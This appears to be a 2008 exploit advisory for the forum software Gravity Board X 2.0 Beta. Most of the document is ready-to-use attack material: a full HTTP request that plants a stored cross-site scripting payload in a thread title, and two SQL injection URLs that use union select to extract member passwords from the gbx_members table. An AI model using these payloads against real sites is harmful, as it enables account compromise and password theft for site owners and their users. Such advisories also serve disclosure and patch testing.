Gravity Board X 2.0 Beta (SQL/XSS) Multiple Remote Vulnerabilities
AUTHOR : CWH Underground
DATE : 12 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Gravity Board X
VERSION : 2.0 Beta
DOWNLOAD : http://downloads.sourceforge.net/gbx
#####################################################
+++ Remote Stored XSS Exploit +++
When you create new thread in forum, you can inject javascript in title field.
-----
POC
-----
[+]POST http://192.168.0.4/gbx/index.php?action=postnewsubmit&board_id=1 HTTP/1.1
[+]Host: 192.168.0.4
[+]User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
[+]Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
[+]Accept-Language: en-us,en;q=0.5
[+]Accept-Encoding: gzip,deflate
[+]Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
[+]Keep-Alive: 300
[+]Connection: keep-alive
[+]Referer: http://127.0.0.1/gbx/index.php?action=postnew&board_id=1
[+]Cookie: PHPSESSID=507c211a3be817f7e7fcf51b3886665a
[+]Content-Type: application/x-www-form-urlencoded
[+]Content-Length: 128
[+]subject=POC+%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&FCKeditorContents=POC+XSS+Thread&formsent=&board_id=1&submit=Post
+++ Remote SQL Injection Exploit +++
** magic_quotes_gpc = Off **
-------------
POC Exploit
-------------
[+]http://[target]/[gbx_path]/index.php?action=getsearch&orderby=dateposted&searchquery=')/**/union/**/select/**/pw/**/from/**/gbx_members/**/where/**/memberid=1/*&byuser=&searchin=submess
[+]http://[target]/[gbx_path]/index.php?action=viewboard&board_id=1'/**/union/**/select/**/1,pw,3/**/from/**/gbx_members/*
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #